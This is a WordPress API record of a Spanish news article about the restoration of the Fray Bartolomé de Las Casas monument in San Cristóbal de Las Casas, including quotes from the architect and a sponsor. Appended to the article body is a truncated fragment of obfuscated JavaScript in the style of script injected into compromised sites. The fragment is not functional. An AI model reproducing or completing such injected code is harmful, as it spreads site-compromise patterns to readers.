{"id":18779,"date":"2024-11-08T04:14:36","date_gmt":"2024-11-08T04:14:36","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=18779"},"modified":"2024-11-08T04:14:37","modified_gmt":"2024-11-08T04:14:37","slug":"inician-trabajos-de-restauracion-del-monumento-dedicado-a-fray-bartolome-de-las-casas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=18779","title":{"rendered":"Inician trabajos de restauraci\u00f3n del monumento dedicado a Fray Bartolom\u00e9 de Las Casas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/FB_IMG_1731039125619-1024x683.jpg\" alt=\"\" class=\"wp-image-18780\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/FB_IMG_1731039125619-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/FB_IMG_1731039125619-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/FB_IMG_1731039125619-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/FB_IMG_1731039125619.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>7 de noviembre del 2024. San Crist\u00f3bal de Las Casas.- El emblem\u00e1tico monumento a Fray Bartolom\u00e9 de Las Casas, ubicado en el centro hist\u00f3rico de San Crist\u00f3bal, inici\u00f3 este mi\u00e9rcoles los trabajos de restauraci\u00f3n necesarios para preservar uno de los s\u00edmbolos m\u00e1s importantes de la ciudad. Esta labor est\u00e1 a cargo del \u201cGrupo Semilla\u201d, un colectivo ciudadano que, de manera altruista, decidi\u00f3 tomar la iniciativa de rehabilitar esta estructura de m\u00e1s de un siglo de antig\u00fcedad, con el respaldo del Instituto Nacional de Antropolog\u00eda e Historia (INAH), que ha otorgado las licencias pertinentes para intervenir en este bien patrimonial.<\/p>\n\n\n\n<p>Fray Bartolom\u00e9 de Las Casas, te\u00f3logo y fraile dominicano, es reconocido por su defensa incansable de los derechos de los pueblos ind\u00edgenas durante la \u00e9poca colonial. Como segundo obispo de Chiapas, su labor marc\u00f3 un hito en la historia, y su figura sigue siendo un referente en la lucha por la justicia social y la dignidad de los pueblos originarios. La escultura, inaugurada en 1909, rinde homenaje a su legado, pero no ha recibido restauraciones significativas desde hace m\u00e1s de 40 a\u00f1os, lo que hizo urgente la intervenci\u00f3n para garantizar su conservaci\u00f3n.<\/p>\n\n\n\n<p>El arquitecto Ra\u00fal Aguilar Moreno, responsable de los trabajos de restauraci\u00f3n, expres\u00f3 su satisfacci\u00f3n por participar en este proceso que busca devolverle al monumento su esplendor original. \u201cEste esfuerzo es un ejemplo de colaboraci\u00f3n entre diferentes actores de la sociedad, desde los ciudadanos hasta las autoridades del INAH. Sin su apoyo, esta intervenci\u00f3n no habr\u00eda sido posible\u201d, coment\u00f3 Aguilar.<\/p>\n\n\n\n<p>Por su parte, Alejandro Ruiz, representante de los patrocinadores del proyecto, destac\u00f3 la importancia cultural de la restauraci\u00f3n para San Crist\u00f3bal. \u201cEste monumento no solo representa la historia de un hombre, sino la de todo un pueblo. La figura de Fray Bartolom\u00e9 de Las Casas est\u00e1 profundamente ligada a la identidad de esta ciudad y, por lo tanto, su preservaci\u00f3n es clave para mantener vivo el recuerdo de nuestra historia\u201d, se\u00f1al\u00f3.<\/p>\n\n\n\n<p>El proyecto de restauraci\u00f3n no solo busca reparar el desgaste de la escultura, sino tambi\u00e9n realizar una intervenci\u00f3n integral que asegure su conservaci\u00f3n para las futuras generaciones, en un contexto donde el patrimonio hist\u00f3rico sigue siendo un pilar fundamental para la identidad y el desarrollo cultural de San Crist\u00f3bal de Las Casas.<\/p>\n\n\n\n<p>La restauraci\u00f3n del monumento es un testimonio del esfuerzo colectivo por conservar el legado de quienes han marcado la historia de la regi\u00f3n y del pa\u00eds, y reafirma el compromiso de la comunidad con la protecci\u00f3n de su patrimonio cultural.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 7 de noviembre del 2024. San Crist\u00f3bal de Las Casas.- El emblem\u00e1tico monumento a Fray Bartolom\u00e9 de Las Casas, ubicado en el centro hist\u00f3rico de San Crist\u00f3bal, inici\u00f3 este mi\u00e9rcoles los trabajos de restauraci\u00f3n necesarios para preservar uno de los s\u00edmbolos m\u00e1s importantes de la ciudad. Esta labor est\u00e1 a cargo del &hellip;<\/p>\n","protected":false},"author":2,"featured_media":18780,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-18779","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18779","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=18779"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18779\/revisions"}],"predecessor-version":[{"id":18781,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18779\/revisions\/18781"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/18780"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=18779"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=18779"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=18779"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}